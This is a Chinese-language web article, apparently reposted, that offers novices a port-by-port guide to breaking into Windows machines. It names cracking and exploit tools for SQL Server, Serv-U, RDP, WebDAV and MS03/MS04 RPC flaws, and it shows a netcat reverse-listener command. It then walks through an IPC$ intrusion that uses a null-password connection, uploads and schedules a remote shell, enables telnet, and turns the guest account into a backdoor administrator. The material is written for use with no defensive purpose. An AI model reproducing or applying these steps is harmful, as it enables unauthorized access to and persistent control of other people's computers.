经典总结:各个网络端口的入侵方法

2017-11-30    来源:

容器云强势上线!快速搭建集群,上万Linux镜像随意使用

  希望对新手入侵有帮助!

  1. 1433端口入侵

  scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

  (以上反向的,测试成功)

  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

  2. 4899端口入侵

  用4899过滤器.exe,扫描空口令的机器

  3. 3899的入侵

  对很早的机器,可以试试3389的溢出(win3389ex.exe)

  对2000的机器,可以试试字典暴破。(tscrack.exe)

  4. 80入侵

  对sp3以前的机器,可以用webdav入侵;

  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

  可以利用SQL进行注入。(啊D的注入软件)。

  5. serv-u入侵(21端口)

  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

  6. 554端口

  用real554.exe入侵。

  7. 6129端口

  用DameWare6129.exe入侵。

  8. 系统漏洞

  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
 9. 3127等端口

  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

  10. 其他入侵

  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

  经典IPC$入侵

  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

  2. C:\>copy srv.exe $">\\127.0.0.1\admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

  3. C:\>net time file://127.0.0.1/

  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

  4. C:\>at file://127.0.0.1/ 11:05 srv.exe

  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

  5. C:\>net time file://127.0.0.1/

  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

  6. C:\>telnet 127.0.0.1 99

  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

  8. C:\WINNT\system32>ntlm

  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

  10. C:\>net user guest /active:yes

  将对方的Guest用户激活

  11. C:\>net user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

  12. C:\>net localgroup administrators guest /add

  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

标签: 漏洞 权限 用户

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点!
本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。

上一篇:浅析中小网站如何对付DoS(拒绝服务)攻击

下一篇:Trojan.Win32.VB.et